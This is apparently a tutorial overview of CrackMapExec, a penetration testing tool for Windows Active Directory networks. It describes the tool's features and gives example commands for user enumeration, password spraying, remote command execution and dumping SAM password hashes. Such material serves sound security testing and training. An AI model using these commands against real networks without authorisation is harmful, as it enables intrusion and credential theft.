CrackMapExec Overview 🔍

CrackMapExec (CME) is an open-source tool used for network enumeration and penetration testing, particularly on Windows networks. It automates the process of gathering information, executing advanced password attacks, and performing post-exploitation activities like lateral movement. CME is often referred to as the “Swiss Army knife” for targeting Windows Active Directory environments. 🛠️

Key Features of CrackMapExec

  1. Active Directory Enumeration: Enumerate domains, forests, users, groups, computers, and trust relationships. 📋
  2. Credential Brute Forcing: Attack various network services (e.g., SMB, RPC, LDAP, and WinRM) with password spraying, credential stuffing, and brute-force attacks. 🔑
  3. Remote Code Execution: Execute commands and scripts remotely on target systems using PowerShell, WMI, SMB, and PSExec. 💻
  4. Lateral Movement: Perform lateral movement and jump between compromised machines using techniques like pass-the-hash, pass-the-ticket, and token impersonation. 🔗
  5. Integration Support: Integrate with other penetration testing tools, such as Metasploit, PowerShell Empire, and BloodHound. 🔄

Example Code Snippets

Here are some example commands you can use with CrackMapExec:

Example 1: Enumerating Domain Users

# Enumerate all users in the domain
crackmapexec smb 192.168.1.0/24 -u 'username' -p 'password' --users

Example 2: Password Spraying

# Perform password spraying attack
crackmapexec smb 192.168.1.0/24 -u 'admin' -p 'password123'

Example 3: Remote Code Execution

# Execute a command on a remote system
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'P@ssw0rd' -x 'whoami'

Example 4: Dumping SAM Hashes

# Dump local SAM hashes from a target system
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'P@ssw0rd' --sam

Learning Resources 📚

For more detailed guides and resources, you can visit the CrackMapExec Cheat Sheet or the PopLabSec tutorial.